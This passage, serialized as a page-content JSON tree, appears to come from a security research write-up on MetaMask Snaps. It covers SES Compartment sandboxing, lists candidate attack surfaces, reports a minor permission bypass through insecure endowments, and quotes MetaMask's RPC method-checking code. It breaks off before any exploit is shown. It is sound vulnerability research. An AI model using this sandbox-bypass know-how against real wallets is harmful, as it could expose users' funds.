Compartment({\n ...endowments,\n module: snapModule,\n exports: snapModule.exports,\n});\n",[44541],{"type":24,"tag":145,"props":44542,"children":44543},{"__ignoreMap":7},[44544,44572,44588,44605,44630],{"type":24,"tag":301,"props":44545,"children":44546},{"class":303,"line":304},[44547,44551,44556,44560,44564,44568],{"type":24,"tag":301,"props":44548,"children":44549},{"style":348},[44550],{"type":30,"value":16460},{"type":24,"tag":301,"props":44552,"children":44553},{"style":369},[44554],{"type":30,"value":44555}," compartment",{"type":24,"tag":301,"props":44557,"children":44558},{"style":385},[44559],{"type":30,"value":2537},{"type":24,"tag":301,"props":44561,"children":44562},{"style":348},[44563],{"type":30,"value":38685},{"type":24,"tag":301,"props":44565,"children":44566},{"style":314},[44567],{"type":30,"value":44197},{"type":24,"tag":301,"props":44569,"children":44570},{"style":359},[44571],{"type":30,"value":4304},{"type":24,"tag":301,"props":44573,"children":44574},{"class":303,"line":320},[44575,44580,44584],{"type":24,"tag":301,"props":44576,"children":44577},{"style":385},[44578],{"type":30,"value":44579}," ...",{"type":24,"tag":301,"props":44581,"children":44582},{"style":369},[44583],{"type":30,"value":44306},{"type":24,"tag":301,"props":44585,"children":44586},{"style":359},[44587],{"type":30,"value":1729},{"type":24,"tag":301,"props":44589,"children":44590},{"class":303,"line":335},[44591,44596,44601],{"type":24,"tag":301,"props":44592,"children":44593},{"style":369},[44594],{"type":30,"value":44595}," module:",{"type":24,"tag":301,"props":44597,"children":44598},{"style":369},[44599],{"type":30,"value":44600}," snapModule",{"type":24,"tag":301,"props":44602,"children":44603},{"style":359},[44604],{"type":30,"value":1729},{"type":24,"tag":301,"props":44606,"children":44607},{"class":303,"line":344},[44608,44613,44617,44621,44626],{"type":24,"tag":301,"props":44609,"children":44610},{"style":369},[44611],{"type":30,"value":44612}," exports:",{"type":24,"tag":301,"props":44614,"children":44615},{"style":369},[44616],{"type":30,"value":44600},{"type":24,"tag":301,"props":44618,"children":44619},{"style":359},[44620],{"type":30,"value":206},{"type":24,"tag":301,"props":44622,"children":44623},{"style":369},[44624],{"type":30,"value":44625},"exports",{"type":24,"tag":301,"props":44627,"children":44628},{"style":359},[44629],{"type":30,"value":1729},{"type":24,"tag":301,"props":44631,"children":44632},{"class":303,"line":401},[44633],{"type":24,"tag":301,"props":44634,"children":44635},{"style":359},[44636],{"type":30,"value":4868},{"type":24,"tag":32,"props":44638,"children":44639},{},[44640,44642,44648,44649,44654,44656,44661],{"type":30,"value":44641},"Note: ",{"type":24,"tag":145,"props":44643,"children":44645},{"className":44644},[],[44646],{"type":30,"value":44647},"module",{"type":30,"value":2378},{"type":24,"tag":145,"props":44650,"children":44652},{"className":44651},[],[44653],{"type":30,"value":44625},{"type":30,"value":44655}," are passed as endowments, but without being ",{"type":24,"tag":5422,"props":44657,"children":44658},{},[44659],{"type":30,"value":44660},"hardened",{"type":30,"value":44662},". This is intentional, as the snap needs to export functions to be correctly executed.",{"type":24,"tag":6246,"props":44664,"children":44665},{"start":335},[44666],{"type":24,"tag":2659,"props":44667,"children":44668},{},[44669],{"type":24,"tag":60,"props":44670,"children":44671},{},[44672,44674],{"type":30,"value":44673},"Evaluate the snap code inside the ",{"type":24,"tag":188,"props":44675,"children":44678},{"href":44676,"rel":44677},"https://github.com/MetaMask/snaps/blob/92fcf31678c13067615e6e69681e57a542a2c58a/packages/snaps-execution-environments/src/common/BaseSnapExecutor.ts#L359",[192],[44679],{"type":30,"value":44143},{"type":24,"tag":291,"props":44681,"children":44683},{"className":3185,"code":44682,"language":3184,"meta":7,"style":7},"await this.executeInSnapContext(snapId, () => {\n compartment.evaluate(sourceCode);\n this.registerSnapExports(snapId, snapModule);\n});\n",[44684],{"type":24,"tag":145,"props":44685,"children":44686},{"__ignoreMap":7},[44687,44728,44758,44795],{"type":24,"tag":301,"props":44688,"children":44689},{"class":303,"line":304},[44690,44694,44698,44702,44707,44711,44715,44720,44724],{"type":24,"tag":301,"props":44691,"children":44692},{"style":308},[44693],{"type":30,"value":39666},{"type":24,"tag":301,"props":44695,"children":44696},{"style":348},[44697],{"type":30,"value":42460},{"type":24,"tag":301,"props":44699,"children":44700},{"style":359},[44701],{"type":30,"value":206},{"type":24,"tag":301,"props":44703,"children":44704},{"style":314},[44705],{"type":30,"value":44706},"executeInSnapContext",{"type":24,"tag":301,"props":44708,"children":44709},{"style":359},[44710],{"type":30,"value":362},{"type":24,"tag":301,"props":44712,"children":44713},{"style":369},[44714],{"type":30,"value":42764},{"type":24,"tag":301,"props":44716,"children":44717},{"style":359},[44718],{"type":30,"value":44719},", () ",{"type":24,"tag":301,"props":44721,"children":44722},{"style":348},[44723],{"type":30,"value":4841},{"type":24,"tag":301,"props":44725,"children":44726},{"style":359},[44727],{"type":30,"value":3035},{"type":24,"tag":301,"props":44729,"children":44730},{"class":303,"line":320},[44731,44736,44740,44745,44749,44754],{"type":24,"tag":301,"props":44732,"children":44733},{"style":369},[44734],{"type":30,"value":44735}," compartment",{"type":24,"tag":301,"props":44737,"children":44738},{"style":359},[44739],{"type":30,"value":206},{"type":24,"tag":301,"props":44741,"children":44742},{"style":314},[44743],{"type":30,"value":44744},"evaluate",{"type":24,"tag":301,"props":44746,"children":44747},{"style":359},[44748],{"type":30,"value":362},{"type":24,"tag":301,"props":44750,"children":44751},{"style":369},[44752],{"type":30,"value":44753},"sourceCode",{"type":24,"tag":301,"props":44755,"children":44756},{"style":359},[44757],{"type":30,"value":589},{"type":24,"tag":301,"props":44759,"children":44760},{"class":303,"line":335},[44761,44765,44769,44774,44778,44782,44786,44791],{"type":24,"tag":301,"props":44762,"children":44763},{"style":348},[44764],{"type":30,"value":42808},{"type":24,"tag":301,"props":44766,"children":44767},{"style":359},[44768],{"type":30,"value":206},{"type":24,"tag":301,"props":44770,"children":44771},{"style":314},[44772],{"type":30,"value":44773},"registerSnapExports",{"type":24,"tag":301,"props":44775,"children":44776},{"style":359},[44777],{"type":30,"value":362},{"type":24,"tag":301,"props":44779,"children":44780},{"style":369},[44781],{"type":30,"value":42764},{"type":24,"tag":301,"props":44783,"children":44784},{"style":359},[44785],{"type":30,"value":377},{"type":24,"tag":301,"props":44787,"children":44788},{"style":369},[44789],{"type":30,"value":44790},"snapModule",{"type":24,"tag":301,"props":44792,"children":44793},{"style":359},[44794],{"type":30,"value":589},{"type":24,"tag":301,"props":44796,"children":44797},{"class":303,"line":344},[44798],{"type":24,"tag":301,"props":44799,"children":44800},{"style":359},[44801],{"type":30,"value":4868},{"type":24,"tag":32,"props":44803,"children":44804},{},[44805,44807,44813,44814,44820,44821,44827],{"type":30,"value":44806},"According to the documentation, the snap must contain one of the following function exports: ",{"type":24,"tag":145,"props":44808,"children":44810},{"className":44809},[],[44811],{"type":30,"value":44812},"onRpcRequest",{"type":30,"value":377},{"type":24,"tag":145,"props":44815,"children":44817},{"className":44816},[],[44818],{"type":30,"value":44819},"onTransaction",{"type":30,"value":152},{"type":24,"tag":145,"props":44822,"children":44824},{"className":44823},[],[44825],{"type":30,"value":44826},"onCronjob",{"type":30,"value":206},{"type":24,"tag":32,"props":44829,"children":44830},{},[44831,44833,44838],{"type":30,"value":44832},"Once the Compartment creates these functions, no matter where they are executed, they will always be evaluated within the sandboxed ",{"type":24,"tag":145,"props":44834,"children":44836},{"className":44835},[],[44837],{"type":30,"value":44157},{"type":30,"value":44839}," environment of that Compartment.",{"type":24,"tag":32,"props":44841,"children":44842},{},[44843],{"type":30,"value":44844},"After the evaluation, the function exports are registered and executed later when the respective event is emmited.",{"type":24,"tag":43,"props":44846,"children":44848},{"id":44847},"vulnerability-research",[44849],{"type":30,"value":44850},"Vulnerability research",{"type":24,"tag":80,"props":44852,"children":44854},{"id":44853},"possible-attacks",[44855],{"type":30,"value":44856},"Possible attacks",{"type":24,"tag":32,"props":44858,"children":44859},{},[44860],{"type":30,"value":44861},"While searching for vulnerabilities in snap environments, we enumerated some features that can be broken, and lead to security issues, such as:",{"type":24,"tag":2655,"props":44863,"children":44864},{},[44865,44870,44875,44880],{"type":24,"tag":2659,"props":44866,"children":44867},{},[44868],{"type":30,"value":44869},"Broken SES Container isolation",{"type":24,"tag":2659,"props":44871,"children":44872},{},[44873],{"type":30,"value":44874},"Insecure endowments in Containers",{"type":24,"tag":2659,"props":44876,"children":44877},{},[44878],{"type":30,"value":44879},"Incorrect RPC permission checks",{"type":24,"tag":2659,"props":44881,"children":44882},{},[44883],{"type":30,"value":44884},"Insecure snap installation/update",{"type":24,"tag":32,"props":44886,"children":44887},{},[44888],{"type":30,"value":44889},"We went through all of these vulnerabilities assumptions, and found a minor permission bypass bug using insecure endowments.",{"type":24,"tag":32,"props":44891,"children":44892},{},[44893],{"type":30,"value":44894},"To understand the exploit, we need to dig into the snap's RPC interfaces exposed via endowments.",{"type":24,"tag":80,"props":44896,"children":44898},{"id":44897},"rpc-interfaces-endowments",[44899],{"type":30,"value":44900},"RPC interfaces endowments",{"type":24,"tag":270,"props":44902,"children":44904},{"id":44903},"providers-limitations",[44905],{"type":30,"value":44906},"Providers limitations",{"type":24,"tag":32,"props":44908,"children":44909},{},[44910,44912,44918,44919,44924,44926,44933],{"type":30,"value":44911},"A snap has two interfaces that can be used to communicate with metamask RPC interface: ",{"type":24,"tag":145,"props":44913,"children":44915},{"className":44914},[],[44916],{"type":30,"value":44917},"snap",{"type":30,"value":2378},{"type":24,"tag":145,"props":44920,"children":44922},{"className":44921},[],[44923],{"type":30,"value":38172},{"type":30,"value":44925}," (EIP-1193). These differ in that each one can only send a subset of the available RPC ",{"type":24,"tag":188,"props":44927,"children":44930},{"href":44928,"rel":44929},"https://github.com/MetaMask/snaps/blob/92fcf31678c13067615e6e69681e57a542a2c58a/packages/snaps-execution-environments/src/common/utils.ts#L130",[192],[44931],{"type":30,"value":44932},"methods",{"type":30,"value":1679},{"type":24,"tag":291,"props":44935,"children":44937},{"className":3185,"code":44936,"language":3184,"meta":7,"style":7},"export function assertSnapOutboundRequest(args: RequestArguments) {\n // Disallow any non `wallet_` or `snap_` methods for separation of concerns.\n assert(\n String.prototype.startsWith.call(args.method, 'wallet_') ||\n String.prototype.startsWith.call(args.method, 'snap_'),\n 'The global Snap API only allows RPC methods starting with `wallet_*` and `snap_*`.',\n );\n assert(\n !BLOCKED_RPC_METHODS.includes(args.method),\n ethErrors.rpc.methodNotFound({\n data: {\n method: args.method,\n },\n }),\n );\n assertStruct(args, JsonStruct, 'Provided value is not JSON-RPC compatible');\n}\n",[44938],{"type":24,"tag":145,"props":44939,"children":44940},{"__ignoreMap":7},[44941,44981,44989,45001,45071,45132,45144,45152,45163,45203,45233,45245,45270,45277,45285,45292,45330],{"type":24,"tag":301,"props":44942,"children":44943},{"class":303,"line":304},[44944,44949,44954,44959,44963,44968,44972,44977],{"type":24,"tag":301,"props":44945,"children":44946},{"style":308},[44947],{"type":30,"value":44948},"export",{"type":24,"tag":301,"props":44950,"children":44951},{"style":348},[44952],{"type":30,"value":44953}," function",{"type":24,"tag":301,"props":44955,"children":44956},{"style":314},[44957],{"type":30,"value":44958}," assertSnapOutboundRequest",{"type":24,"tag":301,"props":44960,"children":44961},{"style":359},[44962],{"type":30,"value":362},{"type":24,"tag":301,"props":44964,"children":44965},{"style":369},[44966],{"type":30,"value":44967},"args",{"type":24,"tag":301,"props":44969,"children":44970},{"style":385},[44971],{"type":30,"value":1679},{"type":24,"tag":301,"props":44973,"children":44974},{"style":10246},[44975],{"type":30,"value":44976}," RequestArguments",{"type":24,"tag":301,"props":44978,"children":44979},{"style":359},[44980],{"type":30,"value":398},{"type":24,"tag":301,"props":44982,"children":44983},{"class":303,"line":320},[44984],{"type":24,"tag":301,"props":44985,"children":44986},{"style":1062},[44987],{"type":30,"value":44988}," // Disallow any non `wallet_` or `snap_` methods for separation of concerns.\n",{"type":24,"tag":301,"props":44990,"children":44991},{"class":303,"line":335},[44992,44997],{"type":24,"tag":301,"props":44993,"children":44994},{"style":314},[44995],{"type":30,"value":44996}," assert",{"type":24,"tag":301,"props":44998,"children":44999},{"style":359},[45000],{"type":30,"value":1707},{"type":24,"tag":301,"props":45002,"children":45003},{"class":303,"line":344},[45004,45009,45013,45018,45022,45027,45031,45036,45040,45044,45048,45053,45057,45062,45066],{"type":24,"tag":301,"props":45005,"children":45006},{"style":10246},[45007],{"type":30,"value":45008}," String",{"type":24,"tag":301,"props":45010,"children":45011},{"style":359},[45012],{"type":30,"value":206},{"type":24,"tag":301,"props":45014,"children":45015},{"style":369},[45016],{"type":30,"value":45017},"prototype",{"type":24,"tag":301,"props":45019,"children":45020},{"style":359},[45021],{"type":30,"value":206},{"type":24,"tag":301,"props":45023,"children":45024},{"style":369},[45025],{"type":30,"value":45026},"startsWith",{"type":24,"tag":301,"props":45028,"children":45029},{"style":359},[45030],{"type":30,"value":206},{"type":24,"tag":301,"props":45032,"children":45033},{"style":314},[45034],{"type":30,"value":45035},"call",{"type":24,"tag":301,"props":45037,"children":45038},{"style":359},[45039],{"type":30,"value":362},{"type":24,"tag":301,"props":45041,"children":45042},{"style":369},[45043],{"type":30,"value":44967},{"type":24,"tag":301,"props":45045,"children":45046},{"style":359},[45047],{"type":30,"value":206},{"type":24,"tag":301,"props":45049,"children":45050},{"style":369},[45051],{"type":30,"value":45052},"method",{"type":24,"tag":301,"props":45054,"children":45055},{"style":359},[45056],{"type":30,"value":377},{"type":24,"tag":301,"props":45058,"children":45059},{"style":329},[45060],{"type":30,"value":45061},"'wallet_'",{"type":24,"tag":301,"props":45063,"children":45064},{"style":359},[45065],{"type":30,"value":911},{"type":24,"tag":301,"props":45067,"children":45068},{"style":385},[45069],{"type":30,"value":45070},"||\n",{"type":24,"tag":301,"props":45072,"children":45073},{"class":303,"line":401},[45074,45079,45083,45087,45091,45095,45099,45103,45107,45111,45115,45119,45123,45128],{"type":24,"tag":301,"props":45075,"children":45076},{"style":10246},[45077],{"type":30,"value":45078}," String",{"type":24,"tag":301,"props":45080,"children":45081},{"style":359},[45082],{"type":30,"value":206},{"type":24,"tag":301,"props":45084,"children":45085},{"style":369},[45086],{"type":30,"value":45017},{"type":24,"tag":301,"props":45088,"children":45089},{"style":359},[45090],{"type":30,"value":206},{"type":24,"tag":301,"props":45092,"children":45093},{"style":369},[45094],{"type":30,"value":45026},{"type":24,"tag":301,"props":45096,"children":45097},{"style":359},[45098],{"type":30,"value":206},{"type":24,"tag":301,"props":45100,"children":45101},{"style":314},[45102],{"type":30,"value":45035},{"type":24,"tag":301,"props":45104,"children":45105},{"style":359},[45106],{"type":30,"value":362},{"type":24,"tag":301,"props":45108,"children":45109},{"style":369},[45110],{"type":30,"value":44967},{"type":24,"tag":301,"props":45112,"children":45113},{"style":359},[45114],{"type":30,"value":206},{"type":24,"tag":301,"props":45116,"children":45117},{"style":369},[45118],{"type":30,"value":45052},{"type":24,"tag":301,"props":45120,"children":45121},{"style":359},[45122],{"type":30,"value":377},{"type":24,"tag":301,"props":45124,"children":45125},{"style":329},[45126],{"type":30,"value":45127},"'snap_'",{"type":24,"tag":301,"props":45129,"children":45130},{"style":359},[45131],{"type":30,"value":4656},{"type":24,"tag":301,"props":45133,"children":45134},{"class":303,"line":415},[45135,45140],{"type":24,"tag":301,"props":45136,"children":45137},{"style":329},[45138],{"type":30,"value":45139}," 'The global Snap API only allows RPC methods starting with `wallet_*` and `snap_*`.'",{"type":24,"tag":301,"props":45141,"children":45142},{"style":359},[45143],{"type":30,"value":1729},{"type":24,"tag":301,"props":45145,"children":45146},{"class":303,"line":439},[45147],{"type":24,"tag":301,"props":45148,"children":45149},{"style":359},[45150],{"type":30,"value":45151}," );\n",{"type":24,"tag":301,"props":45153,"children":45154},{"class":303,"line":447},[45155,45159],{"type":24,"tag":301,"props":45156,"children":45157},{"style":314},[45158],{"type":30,"value":44996},{"type":24,"tag":301,"props":45160,"children":45161},{"style":359},[45162],{"type":30,"value":1707},{"type":24,"tag":301,"props":45164,"children":45165},{"class":303,"line":476},[45166,45170,45175,45179,45183,45187,45191,45195,45199],{"type":24,"tag":301,"props":45167,"children":45168},{"style":385},[45169],{"type":30,"value":27739},{"type":24,"tag":301,"props":45171,"children":45172},{"style":369},[45173],{"type":30,"value":45174},"BLOCKED_RPC_METHODS",{"type":24,"tag":301,"props":45176,"children":45177},{"style":359},[45178],{"type":30,"value":206},{"type":24,"tag":301,"props":45180,"children":45181},{"style":314},[45182],{"type":30,"value":41928},{"type":24,"tag":301,"props":45184,"children":45185},{"style":359},[45186],{"type":30,"value":362},{"type":24,"tag":301,"props":45188,"children":45189},{"style":369},[45190],{"type":30,"value":44967},{"type":24,"tag":301,"props":45192,"children":45193},{"style":359},[45194],{"type":30,"value":206},{"type":24,"tag":301,"props":45196,"children":45197},{"style":369},[45198],{"type":30,"value":45052},{"type":24,"tag":301,"props":45200,"children":45201},{"style":359},[45202],{"type":30,"value":4656},{"type":24,"tag":301,"props":45204,"children":45205},{"class":303,"line":495},[45206,45211,45215,45220,45224,45229],{"type":24,"tag":301,"props":45207,"children":45208},{"style":369},[45209],{"type":30,"value":45210}," ethErrors",{"type":24,"tag":301,"props":45212,"children":45213},{"style":359},[45214],{"type":30,"value":206},{"type":24,"tag":301,"props":45216,"children":45217},{"style":369},[45218],{"type":30,"value":45219},"rpc",{"type":24,"tag":301,"props":45221,"children":45222},{"style":359},[45223],{"type":30,"value":206},{"type":24,"tag":301,"props":45225,"children":45226},{"style":314},[45227],{"type":30,"value":45228},"methodNotFound",{"type":24,"tag":301,"props":45230,"children":45231},{"style":359},[45232],{"type":30,"value":4304},{"type":24,"tag":301,"props":45234,"children":45235},{"class":303,"line":504},[45236,45241],{"type":24,"tag":301,"props":45237,"children":45238},{"style":369},[45239],{"type":30,"value":45240}," data:",{"type":24,"tag":301,"props":45242,"children":45243},{"style":359},[45244],{"type":30,"value":3035},{"type":24,"tag":301,"props":45246,"children":45247},{"class":303,"line":512},[45248,45253,45258,45262,45266],{"type":24,"tag":301,"props":45249,"children":45250},{"style":369},[45251],{"type":30,"value":45252}," method:",{"type":24,"tag":301,"props":45254,"children":45255},{"style":369},[45256],{"type":30,"value":45257}," args",{"type":24,"tag":301,"props":45259,"children":45260},{"style":359},[45261],{"type":30,"value":206},{"type":24,"tag":301,"props":45263,"children":45264},{"style":369},[45265],{"type":30,"value":45052},{"type":24,"tag":301,"props":45267,"children":45268},{"style":359},[45269],{"type":30,"value":1729},{"type":24,"tag":301,"props":45271,"children":45272},{"class":303,"line":592},[45273],{"type":24,"tag":301,"props":45274,"children":45275},{"style":359},[45276],{"type":30,"value":6903},{"type":24,"tag":301,"props":45278,"children":45279},{"class":303,"line":619},[45280],{"type":24,"tag":301,"props":45281,"children":45282},{"style":359},[45283],{"type":30,"value":45284}," }),\n",{"type":24,"tag":301,"props":45286,"children":45287},{"class":303,"line":635},[45288],{"type":24,"tag":301,"props":45289,"children":45290},{"style":359},[45291],{"type":30,"value":45151},{"type":24,"tag":301,"props":45293,"children":45294},{"class":303,"line":643},[45295,45300,45304,45308,45312,45317,45321,45326],{"type":24,"tag":301,"props":45296,"children":45297},{"style":314},[45298],{"type":30,"value":45299}," assertStruct",{"type":24,"tag":301,"props":45301,"children":45302},{"style":359},[45303],{"type":30,"value":362},{"type":24,"tag":301,"props":45305,"children":45306},{"style":369},[45307],{"type":30,"value":44967},{"type":24,"tag":301,"props":45309,"children":45310},{"style":359},[45311],{"type":30,"value":377},{"type":24,"tag":301,"props":45313,"children":45314},{"style":369},[45315],{"type":30,"value":45316},"JsonStruct",{"type":24,"tag":301,"props":45318,"children":45319},{"style":359},[45320],{"type":30,"value":377},{"type":24,"tag":301,"props":45322,"children":45323},{"style":329},[45324],{"type":30,"value":45325},"'Provided value is not JSON-RPC compatible'",{"type":24,"tag":301,"props":45327,"children":45328},{"style":359},[45329],{"type":30,"value":589},{"type":24,"tag":301,"props":45331,"children":45332},{"class":303,"line":652},[45333],{"type":24,"tag":301,"props":45334,"children":45335},{"style":359},[45336],{"type":30,"value":698},{"type":24,"tag":32,"props":45338,"children":45339},{},[45340,45342,45347,45349,45355,45356,45362],{"type":30,"value":45341},"This function is called by the ",{"type":24,"tag":145,"props":45343,"children":45345},{"className":45344},[],[45346],{"type":30,"value":44917},{"type":30,"value":45348}," RPC provider, so it can only send methods starting with ",{"type":24,"tag":145,"props":45350,"children":45352},{"className":45351},[],[45353],{"type":30,"value":45354},"wallet_",{"type":30,"value":152},{"type":24,"tag":145,"props":45357,"children":45359},{"className":45358},[],[45360],{"type":30,"value":45361},"snap_",{"type":30,"value":45363},". In addition, there are some blocked RPC methods that immediately throw an error when encountered.",{"type":24,"tag":32,"props":45365,"children":45366},{},[45367,45369,45374,45376,45381,45383,45389],{"type":30,"value":45368},"On the other hand, the ",{"type":24,"tag":145,"props":45370,"children":45372},{"className":45371},[],[45373],{"type":30,"value":38172},{"type":30,"value":45375}," provider only blocks methods starting with ",{"type":24,"tag":145,"props":45377,"children":45379},{"className":45378},[],[45380],{"type":30,"value":45361},{"type":30,"value":45382}," and the blocked methods. However, it requires the ",{"type":24,"tag":145,"props":45384,"children":45386},{"className":45385},[],[45387],{"type":30,"value":45388},"endowment:ethereum-provider",{"type":30,"value":45390}," permission in the snap manifest.",{"type":24,"tag":270,"props":45392,"children":45394},{"id":45393},"execution-flow",[45395],{"type":30,"value":45396},"Execution flow",{"type":24,"tag":32,"props":45398,"children":45399},{},[45400,45402,45407,45408,45413,45415,45420,45421,45427],{"type":30,"value":45401},"Both providers (",{"type":24,"tag":145,"props":45403,"children":45405},{"className":45404},[],[45406],{"type":30,"value":44917},{"type":30,"value":2378},{"type":24,"tag":145,"props":45409,"children":45411},{"className":45410},[],[45412],{"type":30,"value":38172},{"type":30,"value":45414},") are built outside the SES container with a ",{"type":24,"tag":145,"props":45416,"children":45418},{"className":45417},[],[45419],{"type":30,"value":38247},{"type":30,"value":13277},{"type":24,"tag":188,"props":45422,"children":45425},{"href":45423,"rel":45424},"https://github.com/MetaMask/snaps/blob/main/packages/snaps-execution-environments/src/common/BaseSnapExecutor.ts#L437",[192],[45426],{"type":30,"value":3205},{"type":30,"value":1679},{"type":24,"tag":291,"props":45429,"children":45431},{"className":42674,"code":45430,"language":42676,"meta":7,"style":7}," const request = async (args: RequestArguments) => {\n assertSnapOutboundRequest(args); // or assertEthereumOutboundRequest(args);\n const sanitizedArgs = getSafeJson(args);\n this.notify({ method: 'OutboundRequest' });\n try {\n return await withTeardown(\n originalRequest(sanitizedArgs as unknown as RequestArguments),\n this as any,\n );\n } finally {\n this.notify({ method: 'OutboundResponse' });\n }\n };\n",[45432],{"type":24,"tag":145,"props":45433,"children":45434},{"__ignoreMap":7},[45435,45482,45507,45540,45575,45587,45607,45645,45665,45672,45689,45722,45729],{"type":24,"tag":301,"props":45436,"children":45437},{"class":303,"line":304},[45438,45442,45446,45450,45454,45458,45462,45466,45470,45474,45478],{"type":24,"tag":301,"props":45439,"children":45440},{"style":348},[45441],{"type":30,"value":42931},{"type":24,"tag":301,"props":45443,"children":45444},{"style":314},[45445],{"type":30,"value":38137},{"type":24,"tag":301,"props":45447,"children":45448},{"style":385},[45449],{"type":30,"value":2537},{"type":24,"tag":301,"props":45451,"children":45452},{"style":348},[45453],{"type":30,"value":43107},{"type":24,"tag":301,"props":45455,"children":45456},{"style":359},[45457],{"type":30,"value":873},{"type":24,"tag":301,"props":45459,"children":45460},{"style":369},[45461],{"type":30,"value":44967},{"type":24,"tag":301,"props":45463,"children":45464},{"style":385},[45465],{"type":30,"value":1679},{"type":24,"tag":301,"props":45467,"children":45468},{"style":10246},[45469],{"type":30,"value":44976},{"type":24,"tag":301,"props":45471,"children":45472},{"style":359},[45473],{"type":30,"value":911},{"type":24,"tag":301,"props":45475,"children":45476},{"style":348},[45477],{"type":30,"value":4841},{"type":24,"tag":301,"props":45479,"children":45480},{"style":359},[45481],{"type":30,"value":3035},{"type":24,"tag":301,"props":45483,"children":45484},{"class":303,"line":320},[45485,45490,45494,45498,45502],{"type":24,"tag":301,"props":45486,"children":45487},{"style":314},[45488],{"type":30,"value":45489}," assertSnapOutboundRequest",{"type":24,"tag":301,"props":45491,"children":45492},{"style":359},[45493],{"type":30,"value":362},{"type":24,"tag":301,"props":45495,"children":45496},{"style":369},[45497],{"type":30,"value":44967},{"type":24,"tag":301,"props":45499,"children":45500},{"style":359},[45501],{"type":30,"value":35109},{"type":24,"tag":301,"props":45503,"children":45504},{"style":1062},[45505],{"type":30,"value":45506},"// or assertEthereumOutboundRequest(args);\n",{"type":24,"tag":301,"props":45508,"children":45509},{"class":303,"line":335},[45510,45514,45519,45523,45528,45532,45536],{"type":24,"tag":301,"props":45511,"children":45512},{"style":348},[45513],{"type":30,"value":38300},{"type":24,"tag":301,"props":45515,"children":45516},{"style":369},[45517],{"type":30,"value":45518}," sanitizedArgs",{"type":24,"tag":301,"props":45520,"children":45521},{"style":385},[45522],{"type":30,"value":2537},{"type":24,"tag":301,"props":45524,"children":45525},{"style":314},[45526],{"type":30,"value":45527}," getSafeJson",{"type":24,"tag":301,"props":45529,"children":45530},{"style":359},[45531],{"type":30,"value":362},{"type":24,"tag":301,"props":45533,"children":45534},{"style":369},[45535],{"type":30,"value":44967},{"type":24,"tag":301,"props":45537,"children":45538},{"style":359},[45539],{"type":30,"value":589},{"type":24,"tag":301,"props":45541,"children":45542},{"class":303,"line":344},[45543,45548,45552,45557,45561,45565,45570],{"type":24,"tag":301,"props":45544,"children":45545},{"style":348},[45546],{"type":30,"value":45547}," this",{"type":24,"tag":301,"props":45549,"children":45550},{"style":359},[45551],{"type":30,"value":206},{"type":24,"tag":301,"props":45553,"children":45554},{"style":314},[45555],{"type":30,"value":45556},"notify",{"type":24,"tag":301,"props":45558,"children":45559},{"style":359},[45560],{"type":30,"value":38252},{"type":24,"tag":301,"props":45562,"children":45563},{"style":369},[45564],{"type":30,"value":38257},{"type":24,"tag":301,"props":45566,"children":45567},{"style":329},[45568],{"type":30,"value":45569}," 'OutboundRequest'",{"type":24,"tag":301,"props":45571,"children":45572},{"style":359},[45573],{"type":30,"value":45574}," });\n",{"type":24,"tag":301,"props":45576,"children":45577},{"class":303,"line":401},[45578,45583],{"type":24,"tag":301,"props":45579,"children":45580},{"style":308},[45581],{"type":30,"value":45582}," try",{"type":24,"tag":301,"props":45584,"children":45585},{"style":359},[45586],{"type":30,"value":3035},{"type":24,"tag":301,"props":45588,"children":45589},{"class":303,"line":415},[45590,45594,45598,45603],{"type":24,"tag":301,"props":45591,"children":45592},{"style":308},[45593],{"type":30,"value":482},{"type":24,"tag":301,"props":45595,"children":45596},{"style":308},[45597],{"type":30,"value":4617},{"type":24,"tag":301,"props":45599,"children":45600},{"style":314},[45601],{"type":30,"value":45602}," withTeardown",{"type":24,"tag":301,"props":45604,"children":45605},{"style":359},[45606],{"type":30,"value":1707},{"type":24,"tag":301,"props":45608,"children":45609},{"class":303,"line":439},[45610,45615,45619,45624,45628,45633,45637,45641],{"type":24,"tag":301,"props":45611,"children":45612},{"style":314},[45613],{"type":30,"value":45614}," originalRequest",{"type":24,"tag":301,"props":45616,"children":45617},{"style":359},[45618],{"type":30,"value":362},{"type":24,"tag":301,"props":45620,"children":45621},{"style":369},[45622],{"type":30,"value":45623},"sanitizedArgs",{"type":24,"tag":301,"props":45625,"children":45626},{"style":308},[45627],{"type":30,"value":15640},{"type":24,"tag":301,"props":45629,"children":45630},{"style":10246},[45631],{"type":30,"value":45632}," unknown",{"type":24,"tag":301,"props":45634,"children":45635},{"style":308},[45636],{"type":30,"value":15640},{"type":24,"tag":301,"props":45638,"children":45639},{"style":10246},[45640],{"type":30,"value":44976},{"type":24,"tag":301,"props":45642,"children":45643},{"style":359},[45644],{"type":30,"value":4656},{"type":24,"tag":301,"props":45646,"children":45647},{"class":303,"line":447},[45648,45653,45657,45661],{"type":24,"tag":301,"props":45649,"children":45650},{"style":348},[45651],{"type":30,"value":45652}," this",{"type":24,"tag":301,"props":45654,"children":45655},{"style":308},[45656],{"type":30,"value":15640},{"type":24,"tag":301,"props":45658,"children":45659},{"style":10246},[45660],{"type":30,"value":17163},{"type":24,"tag":301,"props":45662,"children":45663},{"style":359},[45664],{"type":30,"value":1729},{"type":24,"tag":301,"props":45666,"children":45667},{"class":303,"line":476},[45668],{"type":24,"tag":301,"props":45669,"children":45670},{"style":359},[45671],{"type":30,"value":14559},{"type":24,"tag":301,"props":45673,"children":45674},{"class":303,"line":495},[45675,45680,45685],{"type":24,"tag":301,"props":45676,"children":45677},{"style":359},[45678],{"type":30,"value":45679}," } ",{"type":24,"tag":301,"props":45681,"children":45682},{"style":308},[45683],{"type":30,"value":45684},"finally",{"type":24,"tag":301,"props":45686,"children":45687},{"style":359},[45688],{"type":30,"value":3035},{"type":24,"tag":301,"props":45690,"children":45691},{"class":303,"line":504},[45692,45697,45701,45705,45709,45713,45718],{"type":24,"tag":301,"props":45693,"children":45694},{"style":348},[45695],{"type":30,"value":45696}," this",{"type":24,"tag":301,"props":45698,"children":45699},{"style":359},[45700],{"type":30,"value":206},{"type":24,"tag":301,"props":45702,"children":45703},{"style":314},[45704],{"type":30,"value":45556},{"type":24,"tag":301,"props":45706,"children":45707},{"style":359},[45708],{"type":30,"value":38252},{"type":24,"tag":301,"props":45710,"children":45711},{"style":369},[45712],{"type":30,"value":38257},{"type":24,"tag":301,"props":45714,"children":45715},{"style":329},[45716],{"type":30,"value":45717}," 